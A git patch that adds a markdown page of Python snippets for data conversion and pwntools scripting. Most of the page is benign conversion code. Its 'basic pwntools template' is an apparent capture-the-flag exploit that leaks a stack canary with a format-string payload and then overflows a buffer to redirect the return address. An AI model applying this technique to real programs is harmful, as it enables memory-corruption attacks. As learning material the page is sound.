From 15e4602db42bad4120fc9287729d483e0ce20442 Mon Sep 17 00:00:00 2001 From: innocentzero <md-isfarul-haque@proton.me> Date: Tue, 7 Jan 2025 03:01:39 +0530 Subject: [PATCH] add commonly used python snippets Signed-off-by: innocentzero <md-isfarul-haque@proton.me> --- content/resources/2025-01-08-python2.md | 137 ++++++++++++++++++++++++ 1 file changed, 137 insertions(+) create mode 100644 content/resources/2025-01-08-python2.md diff --git a/content/resources/2025-01-08-python2.md b/content/resources/2025-01-08-python2.md new file mode 100644 index 0000000..a253fc0 --- /dev/null +++ b/content/resources/2025-01-08-python2.md @@ -0,0 +1,137 @@ ++++ +title = "Some commonly used and helpful python snippets" +[taxonomies] +tags = ['scripting', 'Python Programming'] ++++ + +## Python Snippets + +- hex to bytes to string + +```python +hex_value = "4765656b73666f724765656b73" +byte_str = bytes.fromhex(hex_value) +result_str = byte_str.decode('utf-8') +``` + +- string to bytes + +```python +byte_arr = str.encode("Foo") +``` + +- string to hexdump + +```python +byte_out = "string".encode().hex() +``` + +- hex string to int + +```python +x = int("deadbeef", 16) +x = int("0xdeadbeef", 0) +x = int("0xdeadbeef", 16) +``` + +- integer to binary/octal/hexadecimal + +```python +bin(23) +oct(31) +hex(26) +``` + +- basic pwntools template + +```py +#!/usr/bin/python +import pwn + +# we use a separate pty to resolve IO issues on some terminals +pty = pwn.process.PTY +proc = pwn.process("./a.out", stdin = pty, stdout = pty) + +proc.recvuntil(b"lies at ") +addr = proc.recvline().decode("utf-8").strip() +# print("addr =", addr) + +addr = int(addr, 16) + +proc.recvline() +proc.recvline() + +pad = b"-" * 11 +buffer = b"a" * 32 +format_string_payload = buffer + pad + b"%21$p" + +proc.sendline(format_string_payload) + +proc.recvline() +proc.sendline(b"2020") + +proc.recvline() +proc.sendline(b"06") + +proc.recvline() +proc.sendline(b"16") + +proc.recvuntil(b"to " + pad) + +canary = proc.recvline().decode("utf-8").strip() +# print("canary =", canary) + +canary = int(canary, 16) + +proc.recvuntil(b"you?") + +buffer = b"a" * 32 +format_string = b"b" * 16 + +padding = b"c" * 8 + +payload = buffer + format_string + padding + pwn.p64(canary) + padding + pwn.p64(addr) + +proc.sendline(payload) + +proc.recvline() +proc.recvline() +print("############################# PROGRAM OUTPUT #########################") +print(proc.recvline().decode("utf-8")) +print("######################################################################") +``` + +- connect to a netcat port + +``` python +io = remote("new.domain.name", 80) +io = remote("12.12.12.12", 5000) +``` + +- receive xyz after connecting + +``` python +io.recv(n) # nbytes +io.recvline() # till newline +io.recvuntil("string") #receive until the occurrence of string +``` + +- send xyz after connecting + +``` python +io.send(b'bytes') +io.sendline(b'bytes') # also sends a newline +``` + +- convert an integer to 32/64 byte address little-endian + +``` python +pwn.p32(some_integer) +pwn.p64(some_integer) +``` + +- same as above, but big-endian, and signed + +``` python +pwn.p64(some_int, endian="big", sign=True) +```